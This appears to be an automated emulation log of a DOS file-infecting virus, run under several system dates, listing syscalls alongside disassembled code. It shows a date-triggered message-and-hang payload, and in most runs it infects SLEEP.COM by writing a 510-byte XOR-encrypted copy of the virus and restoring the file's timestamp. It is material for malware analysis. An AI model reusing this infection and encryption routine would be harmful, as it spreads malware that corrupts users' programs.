{"DateBased":true,"Day":27,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6499,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:59:41.67879393Z | 42 | PC: 12e58 | Get date 0x12e58: cmp dh, 8 0x12e5b: jb 0x12e71 0x12e5d: cmp dl, 0x16 0x12e60: jb 0x12e71 0x12e62: cmp al, 3 0x12e64: jne 0x12e71 0x12e66: mov ah, 9 0x12e68: lea dx, word ptr [bp + 0x138] 0x12e6c: int 0x21 0x12e6e: cli 0x12e6f: jmp 0x12e6e 0x12e71: cmp dh, 5 0x12e74: jae 0x12e79 0x12e76: jmp 0x12f2e 0x12e79: mov ah, 0x1a 0x12e7b: mov dx, 0xfc00 0x12e7e: int 0x21 0x12e80: mov ah, 0x4e 0x12e82: lea dx, word ptr [bp + 0x132] 0x12e86: xor cx, cx |
| 2018-12-25T11:59:41.681528556Z | 9 | PC: 12e6e | Display string (String= ' RTL4 Joop van den Ende Produkties BV Marco Daas (Casting Assistent) Postbus 397 1430 AJ AALSMEER van Cleeffkade 15 1413 BA AALSMEER The Netherlands Wedden dat... je een virus hebt? ') |
{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6499,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:59:41.793610495Z | 42 | PC: 12e58 | Get date 0x12e58: cmp dh, 8 0x12e5b: jb 0x12e71 0x12e5d: cmp dl, 0x16 0x12e60: jb 0x12e71 0x12e62: cmp al, 3 0x12e64: jne 0x12e71 0x12e66: mov ah, 9 0x12e68: lea dx, word ptr [bp + 0x138] 0x12e6c: int 0x21 0x12e6e: cli 0x12e6f: jmp 0x12e6e 0x12e71: cmp dh, 5 0x12e74: jae 0x12e79 0x12e76: jmp 0x12f2e 0x12e79: mov ah, 0x1a 0x12e7b: mov dx, 0xfc00 0x12e7e: int 0x21 0x12e80: mov ah, 0x4e 0x12e82: lea dx, word ptr [bp + 0x132] 0x12e86: xor cx, cx |
| 2018-12-25T11:59:41.796155883Z | 26 | PC: 12f35 | Set disk transfer address |
{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6499,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:59:42.03457387Z | 42 | PC: 12e58 | Get date 0x12e58: cmp dh, 8 0x12e5b: jb 0x12e71 0x12e5d: cmp dl, 0x16 0x12e60: jb 0x12e71 0x12e62: cmp al, 3 0x12e64: jne 0x12e71 0x12e66: mov ah, 9 0x12e68: lea dx, word ptr [bp + 0x138] 0x12e6c: int 0x21 0x12e6e: cli 0x12e6f: jmp 0x12e6e 0x12e71: cmp dh, 5 0x12e74: jae 0x12e79 0x12e76: jmp 0x12f2e 0x12e79: mov ah, 0x1a 0x12e7b: mov dx, 0xfc00 0x12e7e: int 0x21 0x12e80: mov ah, 0x4e 0x12e82: lea dx, word ptr [bp + 0x132] 0x12e86: xor cx, cx |
| 2018-12-25T11:59:42.038330764Z | 26 | PC: 12e80 | Set disk transfer address |
| 2018-12-25T11:59:42.039413278Z | 78 | PC: 12e8a | Find first file |
| 2018-12-25T11:59:42.045978053Z | 67 | PC: 12e97 | Get or set file attributes |
| 2018-12-25T11:59:42.052013713Z | 67 | PC: 12e9f | Get or set file attributes |
| 2018-12-25T11:59:42.06977611Z | 61 | PC: 12ea4 | Open file (Filename = 'SLEEP.COM') |
| 2018-12-25T11:59:42.076513923Z | 87 | PC: 12eaa | Get or set file date and time |
| 2018-12-25T11:59:42.079123378Z | 63 | PC: 12eb7 | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-25T11:59:42.086089023Z | 66 | PC: 12edd | Move file pointer |
| 2018-12-25T11:59:42.087389399Z | 44 | PC: 12ef0 | Get time 0x12ef0: mov byte ptr cs:[bp + 0x19], dl 0x12ef5: lea si, word ptr [bp + 4] 0x12ef9: mov di, 0xfd00 0x12efc: mov cx, 0x19 0x12eff: rep movsb byte ptr es:[di], byte ptr [si] 0x12f01: lea si, word ptr [bp + 0x1d] 0x12f05: mov cx, 0x1e5 0x12f08: nop 0x12f09: lodsb al, byte ptr [si] 0x12f0a: xor al, dl 0x12f0c: stosb byte ptr es:[di], al 0x12f0d: loop 0x12f09 0x12f0f: mov ah, 0x40 0x12f11: mov dx, 0xfd00 0x12f14: mov cx, 0x1fe 0x12f17: nop 0x12f18: int 0x21 0x12f1a: mov ax, 0x4200 0x12f1d: call 0x22ed7 0x12f20: mov ah, 0x40 |
| 2018-12-25T11:59:42.090081918Z | 64 | PC: 12f1a | Write file or device (Write 510 bytes on handle 5) |
| 2018-12-25T11:59:42.098895391Z | 66 | PC: 12edd | Move file pointer (See above) |
| 2018-12-25T11:59:42.100640895Z | 64 | PC: 12f2b | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-25T11:59:42.107433048Z | 87 | PC: 12f44 | Get or set file date and time |
| 2018-12-25T11:59:42.109266493Z | 62 | PC: 12f48 | Close file |
| 2018-12-25T11:59:42.11697071Z | 67 | PC: 12f51 | Get or set file attributes |
| 2018-12-25T11:59:42.127599147Z | 26 | PC: 12f35 | Set disk transfer address |
{"DateBased":true,"Day":1,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6499,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:59:42.170896327Z | 42 | PC: 12e58 | Get date 0x12e58: cmp dh, 8 0x12e5b: jb 0x12e71 0x12e5d: cmp dl, 0x16 0x12e60: jb 0x12e71 0x12e62: cmp al, 3 0x12e64: jne 0x12e71 0x12e66: mov ah, 9 0x12e68: lea dx, word ptr [bp + 0x138] 0x12e6c: int 0x21 0x12e6e: cli 0x12e6f: jmp 0x12e6e 0x12e71: cmp dh, 5 0x12e74: jae 0x12e79 0x12e76: jmp 0x12f2e 0x12e79: mov ah, 0x1a 0x12e7b: mov dx, 0xfc00 0x12e7e: int 0x21 0x12e80: mov ah, 0x4e 0x12e82: lea dx, word ptr [bp + 0x132] 0x12e86: xor cx, cx |
| 2018-12-25T11:59:42.173452006Z | 26 | PC: 12e80 | Set disk transfer address |
| 2018-12-25T11:59:42.175129752Z | 78 | PC: 12e8a | Find first file |
| 2018-12-25T11:59:42.181205996Z | 67 | PC: 12e97 | Get or set file attributes |
| 2018-12-25T11:59:42.188935002Z | 67 | PC: 12e9f | Get or set file attributes |
| 2018-12-25T11:59:42.205222754Z | 61 | PC: 12ea4 | Open file (Filename = 'SLEEP.COM') |
| 2018-12-25T11:59:42.211695621Z | 87 | PC: 12eaa | Get or set file date and time |
| 2018-12-25T11:59:42.213145359Z | 63 | PC: 12eb7 | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-25T11:59:42.219679765Z | 66 | PC: 12edd | Move file pointer |
| 2018-12-25T11:59:42.220934834Z | 44 | PC: 12ef0 | Get time 0x12ef0: mov byte ptr cs:[bp + 0x19], dl 0x12ef5: lea si, word ptr [bp + 4] 0x12ef9: mov di, 0xfd00 0x12efc: mov cx, 0x19 0x12eff: rep movsb byte ptr es:[di], byte ptr [si] 0x12f01: lea si, word ptr [bp + 0x1d] 0x12f05: mov cx, 0x1e5 0x12f08: nop 0x12f09: lodsb al, byte ptr [si] 0x12f0a: xor al, dl 0x12f0c: stosb byte ptr es:[di], al 0x12f0d: loop 0x12f09 0x12f0f: mov ah, 0x40 0x12f11: mov dx, 0xfd00 0x12f14: mov cx, 0x1fe 0x12f17: nop 0x12f18: int 0x21 0x12f1a: mov ax, 0x4200 0x12f1d: call 0x22ed7 0x12f20: mov ah, 0x40 |
| 2018-12-25T11:59:42.223228323Z | 64 | PC: 12f1a | Write file or device (Write 510 bytes on handle 5) |
| 2018-12-25T11:59:42.231279215Z | 66 | PC: 12edd | Move file pointer (See above) |
| 2018-12-25T11:59:42.232527119Z | 64 | PC: 12f2b | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-25T11:59:42.238805379Z | 87 | PC: 12f44 | Get or set file date and time |
| 2018-12-25T11:59:42.240949502Z | 62 | PC: 12f48 | Close file |
| 2018-12-25T11:59:42.248412653Z | 67 | PC: 12f51 | Get or set file attributes |
| 2018-12-25T11:59:42.257878019Z | 26 | PC: 12f35 | Set disk transfer address |
{"DateBased":true,"Day":22,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6499,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:59:42.221870149Z | 42 | PC: 12e58 | Get date 0x12e58: cmp dh, 8 0x12e5b: jb 0x12e71 0x12e5d: cmp dl, 0x16 0x12e60: jb 0x12e71 0x12e62: cmp al, 3 0x12e64: jne 0x12e71 0x12e66: mov ah, 9 0x12e68: lea dx, word ptr [bp + 0x138] 0x12e6c: int 0x21 0x12e6e: cli 0x12e6f: jmp 0x12e6e 0x12e71: cmp dh, 5 0x12e74: jae 0x12e79 0x12e76: jmp 0x12f2e 0x12e79: mov ah, 0x1a 0x12e7b: mov dx, 0xfc00 0x12e7e: int 0x21 0x12e80: mov ah, 0x4e 0x12e82: lea dx, word ptr [bp + 0x132] 0x12e86: xor cx, cx |
| 2018-12-25T11:59:42.224265085Z | 26 | PC: 12e80 | Set disk transfer address |
| 2018-12-25T11:59:42.226104953Z | 78 | PC: 12e8a | Find first file |
| 2018-12-25T11:59:42.233021112Z | 67 | PC: 12e97 | Get or set file attributes |
| 2018-12-25T11:59:42.23958125Z | 67 | PC: 12e9f | Get or set file attributes |
| 2018-12-25T11:59:42.261292845Z | 61 | PC: 12ea4 | Open file (Filename = 'SLEEP.COM') |
| 2018-12-25T11:59:42.268381743Z | 87 | PC: 12eaa | Get or set file date and time |
| 2018-12-25T11:59:42.269777498Z | 63 | PC: 12eb7 | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-25T11:59:42.277164133Z | 66 | PC: 12edd | Move file pointer |
| 2018-12-25T11:59:42.278581147Z | 44 | PC: 12ef0 | Get time 0x12ef0: mov byte ptr cs:[bp + 0x19], dl 0x12ef5: lea si, word ptr [bp + 4] 0x12ef9: mov di, 0xfd00 0x12efc: mov cx, 0x19 0x12eff: rep movsb byte ptr es:[di], byte ptr [si] 0x12f01: lea si, word ptr [bp + 0x1d] 0x12f05: mov cx, 0x1e5 0x12f08: nop 0x12f09: lodsb al, byte ptr [si] 0x12f0a: xor al, dl 0x12f0c: stosb byte ptr es:[di], al 0x12f0d: loop 0x12f09 0x12f0f: mov ah, 0x40 0x12f11: mov dx, 0xfd00 0x12f14: mov cx, 0x1fe 0x12f17: nop 0x12f18: int 0x21 0x12f1a: mov ax, 0x4200 0x12f1d: call 0x22ed7 0x12f20: mov ah, 0x40 |
| 2018-12-25T11:59:42.28101041Z | 64 | PC: 12f1a | Write file or device (Write 510 bytes on handle 5) |
| 2018-12-25T11:59:42.290029972Z | 66 | PC: 12edd | Move file pointer (See above) |
| 2018-12-25T11:59:42.291551299Z | 64 | PC: 12f2b | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-25T11:59:42.29850959Z | 87 | PC: 12f44 | Get or set file date and time |
| 2018-12-25T11:59:42.300178629Z | 62 | PC: 12f48 | Close file |
| 2018-12-25T11:59:42.308707194Z | 67 | PC: 12f51 | Get or set file attributes |
| 2018-12-25T11:59:42.31957771Z | 26 | PC: 12f35 | Set disk transfer address |